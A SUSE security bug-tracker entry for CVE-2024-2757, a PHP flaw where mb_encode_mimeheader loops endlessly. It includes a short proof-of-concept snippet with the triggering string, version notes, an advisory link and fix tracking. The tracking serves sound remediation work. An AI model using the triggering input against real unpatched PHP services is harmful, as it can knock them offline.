Bug 1222855 (CVE-2024-2757)

Summary: VUL-0: CVE-2024-2757: php7,php72,php74,php8: php: mb_encode_mimeheader runs endlessly for some inputs
Product: [Novell Products] SUSE Security Incidents Reporter: SMASH SMASH <smash_bz>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Major    
Priority: P3 - Medium CC: meissner
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/401685/
Whiteboard: CVSSv3.1:SUSE:CVE-2024-2757:7.5:(AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Found By: Security Response Team Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---

Comment 1 Marcus Meissner 2024-04-15 15:37:36 UTC 
QA REPRODUCER: 

Summary
-------
Certain inputs provided to mb_encode_mimeheader trigger an endless loop.

Details
-------
A discernible pattern has not yet been identified, but a specific string
consistently reproduces the issue.

PoC
---
In PHP 8.3.3, execute:

    <?php
    mb_internal_encoding('UTF-8');
    mb_encode_mimeheader(",9868949,9868978,9869015,9689100,9869121,9869615,9870690,9867116,98558119861183. ", "utf-8", 
"B");

The mb_encode_mimeheader function seems to enter an infinite loop and fails to return.
Comment 2 Marcus Meissner 2024-04-16 07:38:28 UTC 
zypper in php-mbstring

before reproducing
Comment 3 Marcus Meissner 2024-04-16 07:39:52 UTC 
does not seem to affect 8.1 from phub
affects factory with 8.3.4
Comment 4 Petr Gajdos 2024-04-16 08:33:15 UTC 
Advisory related to this CVE:
https://github.com/php/php-src/security/advisories/GHSA-fjp9-9hwx-59fq
Comment 6 Petr Gajdos 2024-04-19 08:39:40 UTC 
Submitted for: Tumbleweed only, 8.3 issue (mb_mime_header_encode)
Comment 7 Andrea Mattiazzo 2024-05-31 13:14:02 UTC 
All done, closing.